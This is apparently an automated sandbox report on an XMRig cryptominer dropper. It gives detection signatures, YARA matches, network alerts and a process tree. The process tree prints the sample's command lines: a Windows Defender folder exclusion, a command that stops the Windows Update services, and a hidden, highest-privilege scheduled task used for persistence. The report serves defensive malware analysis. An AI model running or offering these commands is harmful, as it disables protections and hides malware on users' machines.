Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:884914
MD5:eee7b971e0b76a0df56bdac2ac2fa343
SHA1:c80f9d9de5d0dff115bbb7638554dade321d7c65
SHA256:ecd60313ba990f1300b37db4064977e83f109fdf93a728cf434106c1b5b5a2d5
Tags:exex64
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Stop multiple services
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Sample is not signed and drops a device driver
Allocates memory in foreign processes
Hooks processes query functions (used to hide processes)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found hidden mapped module (file has been removed from disk)
Contains functionality to inject code into remote processes
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hooks files or directories query functions (used to hide files and directories)
Contains functionality to compare user and computer (likely to detect sandboxes)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
PE file contains an invalid checksum
Drops PE files
Found evasive API chain checking for process token information
Creates driver files
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found evasive API chain (may stop execution after accessing registry keys)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • file.exe (PID: 7028 cmdline: C:\Users\user\Desktop\file.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343)
    • dialer.exe (PID: 6996 cmdline: C:\Windows\System32\dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
      • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
        • WMIADAP.exe (PID: 5900 cmdline: wmiadap.exe /F /T /R MD5: 9783D0765F31980950445DFD40DB15DA)
      • svchost.exe (PID: 740 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 904 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • dwm.exe (PID: 992 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
      • svchost.exe (PID: 356 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 464 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1048 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1064 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • dxpserver.exe (PID: 2700 cmdline: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343)
      • svchost.exe (PID: 1120 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1208 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1304 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1376 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1384 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1396 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1496 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1548 cmdline: c:\windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1556 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1564 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s FontCache MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1664 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1716 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s nsi MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1796 cmdline: c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1820 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • powershell.exe (PID: 7000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6760 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5976 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 7068 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 3172 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 5672 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 5656 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
  • powershell.exe (PID: 3804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; } MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 4500 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 868 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5164 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 7008 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 3360 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 1464 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysPUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9nDetects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.binFlorian Roth
    • 0x1789:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
    • 0x1749:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67
    • 0x17c5:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
    • 0x1949:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
    • 0x17f5:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
    • 0x1915:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
    • 0x18d1:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
    • 0x1831:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 ...
    C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpXMRIG_Monero_MinerDetects Monero mining softwareFlorian Roth (Nextron Systems)
    • 0x4d1250:$s1: 'h' hashrate, 'p' pause, 'r' resume
    • 0x4c8e86:$s2: --cpu-affinity
    • 0x4c8ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
    • 0x4c86a8:$s4: password for mining server
    C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth (Nextron Systems)
    • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
      • 0x4d1fc8:$s3: \\.\WinRing0_
      • 0x4ca4c8:$s4: pool_wallet
      • 0x4c62d0:$s5: cryptonight
      • 0x4c62e0:$s5: cryptonight
      • 0x4c62f0:$s5: cryptonight
      • 0x4c6300:$s5: cryptonight
      • 0x4c6318:$s5: cryptonight
      • 0x4c6328:$s5: cryptonight
      • 0x4c6338:$s5: cryptonight
      • 0x4c6350:$s5: cryptonight
      • 0x4c6360:$s5: cryptonight
      • 0x4c6378:$s5: cryptonight
      • 0x4c6390:$s5: cryptonight
      • 0x4c63a0:$s5: cryptonight
      • 0x4c63b0:$s5: cryptonight
      • 0x4c63c0:$s5: cryptonight
      • 0x4c63d8:$s5: cryptonight
      • 0x4c63f0:$s5: cryptonight
      • 0x4c6400:$s5: cryptonight
      • 0x4c6410:$s5: cryptonight
      Click to see the 1 entries
      SourceRuleDescriptionAuthorStrings
      00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
        00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
          00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
            00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
              00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                31.2.dxpserver.exe.7ff652ae4520.7.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  31.2.dxpserver.exe.7ff652abfa80.5.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    31.2.dxpserver.exe.7ff652ae4520.7.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      31.2.dxpserver.exe.7ff652ae0c40.8.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                        31.2.dxpserver.exe.7ff652f15b40.6.unpackXMRIG_Monero_MinerDetects Monero mining softwareFlorian Roth (Nextron Systems)
                        • 0x4d0250:$s1: 'h' hashrate, 'p' pause, 'r' resume
                        • 0x4c7e86:$s2: --cpu-affinity
                        • 0x4c7ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
                        • 0x4c76a8:$s4: password for mining server
                        Click to see the 14 entries

                        Operating System Destruction

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3452, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 6760, ProcessName: cmd.exe
                        Timestamp:192.168.2.6188.165.24.13149711802035420 06/09/23-13:30:16.918144
                        SID:2035420
                        Source Port:49711
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.6188.165.24.13149711802011341 06/09/23-13:30:16.918144
                        SID:2011341
                        Source Port:49711
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.6188.165.24.13149713802011341 06/09/23-13:31:25.852328
                        SID:2011341
                        Source Port:49713
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.6188.165.24.13149713802035420 06/09/23-13:31:25.852328
                        SID:2035420
                        Source Port:49713
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: file.exeReversingLabs: Detection: 40%
                        Source: file.exeVirustotal: Detection: 35%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpReversingLabs: Detection: 44%
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpVirustotal: Detection: 64%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeReversingLabs: Detection: 40%

                        Bitcoin Miner

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652ae4520.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652abfa80.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652ae4520.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652ae0c40.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.617274824.00007FF652ABC000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPED
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BBBE3C FindFirstFileExW,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C1BE3C FindFirstFileExW,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C03BE3C FindFirstFileExW,

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2035420 ET TROJAN Win32/Pripyat Activity (POST) 192.168.2.6:49711 -> 188.165.24.131:80
                        Source: TrafficSnort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.6:49711 -> 188.165.24.131:80
                        Source: TrafficSnort IDS: 2035420 ET TROJAN Win32/Pripyat Activity (POST) 192.168.2.6:49713 -> 188.165.24.131:80
                        Source: TrafficSnort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.6:49713 -> 188.165.24.131:80
                        Source: powershell.exe, 0000000C.00000002.572278979.000002BB4CF18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.527103486.000002BB4CF0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micro.com/pki/certs/MicRooCerAut_2010-06-23.crt0
                        Source: powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 0000000C.00000003.539682718.000002BB4D166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cok
                        Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000C.00000003.516711520.000002BB36805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB369C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB368D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB3690E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.521657211.000002BB3625E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                        System Summary

                        barindex
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                        Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
